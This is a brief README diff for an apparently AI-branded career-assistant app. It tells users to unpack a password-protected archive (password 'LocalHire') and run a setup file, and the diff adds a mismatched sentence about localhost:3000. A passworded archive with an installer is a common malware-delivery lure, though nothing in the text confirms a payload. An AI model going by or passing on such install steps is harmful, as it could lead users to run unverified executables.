mattpetrovhq1989l6/LocalHire-Your-Private-AI-Career-Assistant/README.md

 3. Extract the files using any archiver (WinRAR / 7-Zip)
    - **Password:** `LocalHire`
-4. Open the extracted folder and run the setup file to install the application
+4. Open the extracted folder and run the setup file to install the application The app will be available at http://localhost:3000 after starting.